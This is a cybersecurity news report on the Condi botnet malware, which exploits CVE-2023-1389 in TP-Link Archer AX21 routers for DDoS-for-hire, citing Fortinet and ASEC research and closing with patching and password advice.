A newly identified malware strain, known as Condi, is leveraging a vulnerability found in TP-Link Archer AX21 (AX1800) Wi-Fi routers to integrate these devices into a distributed denial-of-service (DDoS) botnet. This campaign, according to Fortinet’s FortiGuard Labs, has intensified since late May 2023, marking a significant escalation in cyber threats targeted at consumer-grade networking equipment.
The threat actor behind this campaign operates under the alias zxcr9999 on Telegram and runs a channel called Condi Network, where they market their malicious services. Launched in May 2022, this channel has enabled the actor to monetize the botnet by offering DDoS-as-a-service and selling the source code of the malware.
Research conducted by cybersecurity specialists, Joie Salvio and Roy Tay, indicates that Condi is engineered to eliminate competing botnets on the same network host, although it lacks a persistence mechanism that would allow it to endure system reboots. This shortcoming is somewhat mitigated by its ability to purge various binaries that could terminate or restart the system, including commands like ‘reboot,’ ‘shutdown,’ and ‘poweroff.’
Unlike other malicious software that relies on brute-force attacks for proliferation, Condi employs a scanner module specifically designed to identify vulnerable TP-Link Archer AX21 routers. Upon detection, it executes a shell script retrieved from a remote server, thereby installing the malware without requiring direct user interaction. The software targets vulnerabilities associated with CVE-2023-1389, a command injection flaw with a CVSS score of 8.8, which had previously been exploited by the notorious Mirai botnet.
Fortinet has also encountered other Condi variants that exploit known security flaws, reinforcing the notion that unpatched software remains a prime target for botnet malware. Beyond its aggressive monetization strategies, Condi’s primary objective is to amass a robust DDoS botnet that can be rented out to execute TCP and UDP flood attacks against various online services.
This development aligns with broader trends noted by the AhnLab Security Emergency Response Center (ASEC), which revealed that inadequately managed Linux servers are increasingly being compromised to deploy DDoS bots such as ShellBot and Tsunami, while also hijacking resources for cryptocurrency mining. ASEC emphasized that the source code for Tsunami is publicly available, facilitating its adoption by numerous threat actors for diverse attacks, especially against Internet of Things (IoT) devices.
The attack methods employed typically involve compromising servers through dictionary attacks to install rogue shell scripts that facilitate the download of subsequent stages of malware. This includes maintaining persistent access through alterations to files like .ssh/authorized_keys.
In terms of the MITRE ATT&CK framework for cybersecurity, the tactics and techniques likely utilized in the Condi campaign may encompass initial access, command and control, and privilege escalation. These categories highlight the sophisticated approaches malicious actors often employ to penetrate systems and exploit vulnerabilities.
As cyber threats continue to evolve, business owners must take proactive measures to secure their networks. Implementing robust password policies and regular software updates can significantly mitigate the risks associated with emerging malware strains like Condi.
For continuous updates on cybersecurity incidents, follow us on platforms such as Google News, Twitter, and LinkedIn to stay informed on the latest threats impacting businesses today.
